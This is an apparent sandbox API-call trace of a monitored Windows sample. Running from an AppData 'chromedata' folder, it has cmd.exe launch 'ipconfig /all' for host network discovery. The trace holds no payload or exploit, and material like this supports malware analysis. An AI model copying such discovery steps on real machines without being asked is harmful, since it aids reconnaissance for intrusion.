	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a5b4c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a5b4c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a5b4c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a5b4930, cchData=8 | out: lpLCData=".") returned 2
	[0218.359] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a5b4920, cchData=8 | out: lpLCData=",") returned 2
	[0218.359] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0218.361] GetProcessHeap () returned 0x1f0000
	[0218.361] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x20c) returned 0x2028e8
	[0218.361] GetConsoleTitleW (in: lpConsoleTitle=0x2028e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0218.361] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0218.361] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0218.361] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0218.361] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0218.362] GetProcessHeap () returned 0x1f0000
	[0218.362] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x400a) returned 0x203af0
	[0218.362] GetProcessHeap () returned 0x1f0000
	[0218.362] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x203af0 | out: hHeap=0x1f0000) returned 1
	[0218.363] _wcsicmp (_String1="ipconfig", _String2=")") returned 64
	[0218.363] _wcsicmp (_String1="FOR", _String2="ipconfig") returned -3
	[0218.363] _wcsicmp (_String1="FOR/?", _String2="ipconfig") returned -3
	[0218.363] _wcsicmp (_String1="IF", _String2="ipconfig") returned -10
	[0218.363] _wcsicmp (_String1="IF/?", _String2="ipconfig") returned -10
	[0218.363] _wcsicmp (_String1="REM", _String2="ipconfig") returned 9
	[0218.363] _wcsicmp (_String1="REM/?", _String2="ipconfig") returned 9
	[0218.363] GetProcessHeap () returned 0x1f0000
	[0218.363] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x58) returned 0x202b00
	[0218.363] GetProcessHeap () returned 0x1f0000
	[0218.363] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x1a) returned 0x1fe8a8
	[0218.363] GetProcessHeap () returned 0x1f0000
	[0218.363] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x14) returned 0x2000a8
	[0218.364] GetConsoleTitleW (in: lpConsoleTitle=0x18f334, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0218.364] _wcsicmp (_String1="ipconfig", _String2="DIR") returned 5
	[0218.364] _wcsicmp (_String1="ipconfig", _String2="ERASE") returned 4
	[0218.364] _wcsicmp (_String1="ipconfig", _String2="DEL") returned 5
	[0218.364] _wcsicmp (_String1="ipconfig", _String2="TYPE") returned -11
	[0218.364] _wcsicmp (_String1="ipconfig", _String2="COPY") returned 6
	[0218.364] _wcsicmp (_String1="ipconfig", _String2="CD") returned 6
	[0218.364] _wcsicmp (_String1="ipconfig", _String2="CHDIR") returned 6
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="RENAME") returned -9
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="REN") returned -9
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="ECHO") returned 4
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="SET") returned -10
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="PAUSE") returned -7
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="DATE") returned 5
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="TIME") returned -11
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="PROMPT") returned -7
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="MD") returned -4
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="MKDIR") returned -4
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="RD") returned -9
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="RMDIR") returned -9
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="PATH") returned -7
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="GOTO") returned 2
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="SHIFT") returned -10
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="CLS") returned 6
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="CALL") returned 6
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="VERIFY") returned -13
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="VER") returned -13
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="VOL") returned -13
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="EXIT") returned 4
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="SETLOCAL") returned -10
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="ENDLOCAL") returned 4
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="TITLE") returned -11
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="START") returned -10
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="DPATH") returned 5
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="KEYS") returned -2
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="MOVE") returned -4
	[0218.365] _wcsicmp (_String1="ipconfig", _String2="PUSHD") returned -7
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="POPD") returned -7
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="ASSOC") returned 8
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="FTYPE") returned 3
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="BREAK") returned 7
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="COLOR") returned 6
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="MKLINK") returned -4
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="DIR") returned 5
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="ERASE") returned 4
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="DEL") returned 5
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="TYPE") returned -11
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="COPY") returned 6
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="CD") returned 6
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="CHDIR") returned 6
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="RENAME") returned -9
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="REN") returned -9
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="ECHO") returned 4
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="SET") returned -10
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="PAUSE") returned -7
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="DATE") returned 5
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="TIME") returned -11
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="PROMPT") returned -7
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="MD") returned -4
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="MKDIR") returned -4
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="RD") returned -9
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="RMDIR") returned -9
	[0218.366] _wcsicmp (_String1="ipconfig", _String2="PATH") returned -7
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="GOTO") returned 2
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="SHIFT") returned -10
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="CLS") returned 6
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="CALL") returned 6
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="VERIFY") returned -13
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="VER") returned -13
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="VOL") returned -13
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="EXIT") returned 4
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="SETLOCAL") returned -10
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="ENDLOCAL") returned 4
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="TITLE") returned -11
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="START") returned -10
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="DPATH") returned 5
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="KEYS") returned -2
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="MOVE") returned -4
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="PUSHD") returned -7
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="POPD") returned -7
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="ASSOC") returned 8
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="FTYPE") returned 3
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="BREAK") returned 7
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="COLOR") returned 6
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="MKLINK") returned -4
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="FOR") returned 3
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="IF") returned 10
	[0218.367] _wcsicmp (_String1="ipconfig", _String2="REM") returned -9
	[0218.368] GetProcessHeap () returned 0x1f0000
	[0218.368] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x210) returned 0x202b60
	[0218.368] GetProcessHeap () returned 0x1f0000
	[0218.368] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x26) returned 0x202d78
	[0218.368] _wcsnicmp (_String1="ipco", _String2="cmd ", _MaxCount=0x4) returned 6
	[0218.368] GetProcessHeap () returned 0x1f0000
	[0218.368] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x418) returned 0x1f07f0
	[0218.368] SetErrorMode (uMode=0x0) returned 0x8001
	[0218.368] SetErrorMode (uMode=0x1) returned 0x0
	[0218.368] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1f07f8, lpFilePart=0x18ee54 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpFilePart=0x18ee54*="chromedata") returned 0x30
	[0218.368] SetErrorMode (uMode=0x8001) returned 0x1
	[0218.368] GetProcessHeap () returned 0x1f0000
	[0218.368] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x1f07f0, Size=0x7c) returned 0x1f07f0
	[0218.368] GetProcessHeap () returned 0x1f0000
	[0218.368] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x1f07f0) returned 0x7c
	[0218.369] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0218.369] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0218.369] GetProcessHeap () returned 0x1f0000
	[0218.369] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x17e) returned 0x202da8
	[0218.369] GetProcessHeap () returned 0x1f0000
	[0218.369] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x2f4) returned 0x1f0878
	[0218.384] GetProcessHeap () returned 0x1f0000
	[0218.384] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x1f0878, Size=0x180) returned 0x1f0878
	[0218.384] GetProcessHeap () returned 0x1f0000
	[0218.384] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x1f0878) returned 0x180
	[0218.384] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0218.384] GetProcessHeap () returned 0x1f0000
	[0218.384] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xe0) returned 0x202f30
	[0218.384] GetProcessHeap () returned 0x1f0000
	[0218.384] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x202f30, Size=0x76) returned 0x202f30
	[0218.384] GetProcessHeap () returned 0x1f0000
	[0218.384] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x202f30) returned 0x76
	[0218.385] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.385] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\ipconfig.*", fInfoLevelId=0x1, lpFindFileData=0x18ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebd0) returned 0xffffffff
	[0218.385] GetLastError () returned 0x2
	[0218.385] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\ipconfig", fInfoLevelId=0x1, lpFindFileData=0x18ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebd0) returned 0xffffffff
	[0218.385] GetLastError () returned 0x2
	[0218.385] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.385] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\ipconfig.*", fInfoLevelId=0x1, lpFindFileData=0x18ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebd0) returned 0xffffffff
	[0218.386] GetLastError () returned 0x2
	[0218.386] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\ipconfig", fInfoLevelId=0x1, lpFindFileData=0x18ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebd0) returned 0xffffffff
	[0218.386] GetLastError () returned 0x2
	[0218.386] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ipconfig.*", fInfoLevelId=0x1, lpFindFileData=0x18ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebd0) returned 0x202fb0
	[0218.386] GetProcessHeap () returned 0x1f0000
	[0218.386] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x14) returned 0x202ff0
	[0218.386] FindClose (in: hFindFile=0x202fb0 | out: hFindFile=0x202fb0) returned 1
	[0218.387] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ipconfig.COM", fInfoLevelId=0x1, lpFindFileData=0x18ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebd0) returned 0xffffffff
	[0218.387] GetLastError () returned 0x2
	[0218.387] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ipconfig.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ebd0) returned 0x202fb0
	[0218.387] GetProcessHeap () returned 0x1f0000
	[0218.387] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x202ff0, Size=0x4) returned 0x202ff0
	[0218.387] FindClose (in: hFindFile=0x202fb0 | out: hFindFile=0x202fb0) returned 1
	[0218.387] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0218.387] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0218.387] GetConsoleTitleW (in: lpConsoleTitle=0x18f0c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0218.387] InitializeProcThreadAttributeList (in: lpAttributeList=0x18ef50, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f018 | out: lpAttributeList=0x18ef50, lpSize=0x18f018) returned 1
	[0218.387] UpdateProcThreadAttribute (in: lpAttributeList=0x18ef50, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f010, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18ef50, lpPreviousValue=0x0) returned 1
	[0218.387] GetStartupInfoW (in: lpStartupInfo=0x18ef0c | out: lpStartupInfo=0x18ef0c*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x150, hStdError=0x150)) 
	[0218.387] GetProcessHeap () returned 0x1f0000
	[0218.387] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x18) returned 0x202fb0
	[0218.387] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0218.387] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0218.387] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0218.387] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0218.387] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0218.387] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0218.387] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0218.387] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0218.388] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0218.388] GetProcessHeap () returned 0x1f0000
	[0218.388] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x202fb0 | out: hHeap=0x1f0000) returned 1
	[0218.388] GetProcessHeap () returned 0x1f0000
	[0218.388] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xa) returned 0x1fd540
	[0218.388] lstrcmpW (lpString1="\\ipconfig.exe", lpString2="\\XCOPY.EXE") returned -1
	[0218.389] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\ipconfig.exe", lpCommandLine="ipconfig  /all", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpStartupInfo=0x18efac*(cb=0x48, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="ipconfig  /all", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18eff8 | out: lpCommandLine="ipconfig  /all", lpProcessInformation=0x18eff8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcf4, dwThreadId=0xcf0)) returned 1
	[0218.397] CloseHandle (hObject=0x4c) returned 1
	[0218.397] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0218.397] GetProcessHeap () returned 0x1f0000
	[0218.397] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x201f28 | out: hHeap=0x1f0000) returned 1
	[0218.397] GetEnvironmentStringsW () returned 0x201f28*
	[0218.397] GetProcessHeap () returned 0x1f0000
	[0218.397] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x97c) returned 0x2001f8
	[0218.397] FreeEnvironmentStringsW (penv=0x201f28) returned 1
	[0218.397] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0218.689] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18eeec | out: lpExitCode=0x18eeec*=0x0) returned 1
	[0218.689] CloseHandle (hObject=0x50) returned 1
	[0218.689] _vsnwprintf (in: _Buffer=0x18f034, _BufferCount=0x13, _Format="%08X", _ArgList=0x18eef8 | out: _Buffer="00000000") returned 8
	[0218.689] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0218.689] GetProcessHeap () returned 0x1f0000
	[0218.689] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x2001f8 | out: hHeap=0x1f0000) returned 1
	[0218.689] GetEnvironmentStringsW () returned 0x203128*
	[0218.689] GetProcessHeap () returned 0x1f0000
	[0218.689] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x9a2) returned 0x2001f8
	[0218.689] FreeEnvironmentStringsW (penv=0x203128) returned 1
	[0218.689] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0218.689] GetProcessHeap () returned 0x1f0000
	[0218.689] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x2001f8 | out: hHeap=0x1f0000) returned 1
	[0218.689] GetEnvironmentStringsW () returned 0x203128*
	[0218.689] GetProcessHeap () returned 0x1f0000
	[0218.689] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x9a2) returned 0x2001f8
	[0218.689] FreeEnvironmentStringsW (penv=0x203128) returned 1
	[0218.690] GetProcessHeap () returned 0x1f0000
	[0218.690] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x1fd540 | out: hHeap=0x1f0000) returned 1
	[0218.690] DeleteProcThreadAttributeList (in: lpAttributeList=0x18ef50 | out: lpAttributeList=0x18ef50) 
	[0218.690] _get_osfhandle (_FileHandle=1) returned 0x150
	[0218.690] SetConsoleMode (hConsoleHandle=0x150, dwMode=0x0) returned 0
	[0218.690] _get_osfhandle (_FileHandle=1) returned 0x150
	[0218.690] GetConsoleMode (in: hConsoleHandle=0x150, lpMode=0x4a5b41ac | out: lpMode=0x4a5b41ac) returned 0
	[0218.690] _get_osfhandle (_FileHandle=0) returned 0x154
	[0218.690] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x4a5b41b0 | out: lpMode=0x4a5b41b0) returned 0
	[0218.690] GetConsoleOutputCP () returned 0x1b5
	[0218.690] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5b4260 | out: lpCPInfo=0x4a5b4260) returned 1
	[0218.690] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0218.690] exit (_Code=0) 

Process:
	id = "44"
	image_name = "ipconfig.exe"
	filename = "c:\\windows\\system32\\ipconfig.exe"
	page_root = "0x7ee17760"
	os_pid = "0xcf4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "43"
	os_parent_pid = "0x3ec"
	cmd_line = "ipconfig  /all"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 263
	os_tid = 0xcf0

	[0218.553] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x21fe64 | out: lpSystemTimeAsFileTime=0x21fe64*(dwLowDateTime=0x6a672f40, dwHighDateTime=0x1d50a6a)) 
	[0218.553] GetCurrentProcessId () returned 0xcf4
	[0218.553] GetCurrentThreadId () returned 0xcf0
	[0218.553] GetTickCount () returned 0xa8cf43
	[0218.553] QueryPerformanceCounter (in: lpPerformanceCount=0x21fe5c | out: lpPerformanceCount=0x21fe5c*=29239068005) returned 1
	[0218.554] GetModuleHandleA (lpModuleName=0x0) returned 0xa30000
	[0218.554] __set_app_type (_Type=0x1) 
	[0218.554] __p__fmode () returned 0x770231f4
	[0218.554] __p__commode () returned 0x770231fc
	[0218.554] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa351ed) returned 0x0
	[0218.554] __getmainargs (in: _Argc=0xa370a4, _Argv=0xa370ac, _Env=0xa370a8, _DoWildCard=0, _StartInfo=0xa370b8 | out: _Argc=0xa370a4, _Argv=0xa370ac, _Env=0xa370a8) returned 0
	[0218.554] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0218.554] setlocale (category=0, locale="") returned="English_United States.1252"
	[0218.556] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0218.557] GetCommandLineW () returned="ipconfig  /all"
	[0218.557] CommandLineToArgvW (in: lpCmdLine="ipconfig  /all", pNumArgs=0x21fe10 | out: pNumArgs=0x21fe10) returned 0x415a80*="ipconfig"
	[0218.557] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.557] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="debug", cchCount1=-1, lpString2="all", cchCount2=-2) returned 3
	[0218.558] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="allcompartments", cchCount1=-1, lpString2="all", cchCount2=-2) returned 3
	[0218.558] CompareStringW (Locale=0x400, dwCmpFlags=0x30001, lpString1="all", cchCount1=-1, lpString2="all", cchCount2=-2) returned 2
	[0218.558] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
